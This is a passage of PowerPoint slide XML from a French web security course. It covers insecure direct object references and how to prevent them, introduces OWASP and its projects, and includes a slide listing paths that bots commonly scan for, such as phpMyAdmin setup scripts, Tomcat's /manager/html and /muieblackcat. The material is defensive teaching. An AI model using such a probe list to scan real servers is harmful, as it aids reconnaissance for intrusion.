                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Exemple : accès à la page de modification d’un autre produit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://securite-app-gruyere.herokuapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/compte/produits/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prévention : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vérifier que l’utilisateur a les droits sur la donnée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utiliser une référence indirecte</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Shape 439"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426650" y="2796525"/>
            <a:ext cx="717299" cy="882899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2000" b="1"/>
              <a:t>+ 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1000" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2000" b="1"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2000" b="1"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Shape 440"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8150275" y="2585625"/>
            <a:ext cx="384899" cy="1233599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="6000"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Shape 441"/>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43</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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fr"/>
              <a:t>Fonctionnalités accessibles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Shape 447"/>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endParaRPr sz="2400" i="1">
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Shape 448"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240925" y="1341975"/>
            <a:ext cx="8903100" cy="1922999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Dosis"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple de fichiers scannés par les bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Shape 449"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747350" y="2069125"/>
            <a:ext cx="3839400" cy="2754899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>/manager/html</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/cgi-bin/.*</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/forms/proxyjudge.php</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/CFIDE/administrator/</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/clientaccesspolicy.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>/redirect.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Shape 450"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4460625" y="2059025"/>
            <a:ext cx="4686300" cy="2754899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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/MyAdmin/scripts/setup.php</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/pma/scripts/setup.php</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/phpmyadmin/scripts/setup.php</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/phpMyAdmin.*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>/muieblackcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Shape 451"/>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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385450" y="1418175"/>
            <a:ext cx="8464199" cy="4381500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Communauté en ligne travaillant sur la sécurité Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>fondée en 2001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>libre et ouverte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>recommandations, outils et méthode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Shape 457"/>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a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Shape 458"/>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Open Web Application Security Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Shape 459"/>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45</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="460" name="Shape 460"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505783" y="3932021"/>
            <a:ext cx="2132424" cy="2132424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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385450" y="1418175"/>
            <a:ext cx="8464199" cy="5354999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0"/>
              <a:t>Quelques projets phares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0"/>
              <a:t>OWASP Top Ten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0"/>
              <a:t>WebGoat Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0"/>
              <a:t>Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Shape 466"/>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dirty="0"/>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Shape 467"/>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Open Web Application Security Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Shape 468"/>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lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="fr"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="469" name="Shape 469"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1506898" y="2462650"/>
            <a:ext cx="6263875" cy="2663874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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Shape 474"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5342825" y="2101025"/>
            <a:ext cx="2734024" cy="1248875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="475" name="Shape 475"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="18146"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="894875" y="1506150"/>
            <a:ext cx="2979174" cy="2438624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Shape 476"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126994" y="105309"/>
            <a:ext cx="8339700" cy="677999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scanner</a:t>
            </a:r>
            <a:endParaRPr lang="fr" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="477" name="Shape 477"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3553301" y="3686251"/>
            <a:ext cx="2525949" cy="2310974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Shape 478"/>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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Shape 483"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2129362" y="1824087"/>
            <a:ext cx="4885275" cy="3209824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Shape 484"/>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48</a:t>
            </a:fld>
            <a:endParaRPr lang="f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5</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Shape 98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1319050" y="1338112"/>
            <a:ext cx="6550574" cy="4486575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Shape 99"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126994" y="105309"/>
            <a:ext cx="8339700" cy="677999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>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Personas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 105"/>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endParaRPr sz="2400" i="1">
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5489275" y="2051975"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Shape 107"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499625" y="2051975"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Shape 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882525" y="3924775"/>
            <a:ext cx="2948700" cy="978000"/>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fr" sz="3000">
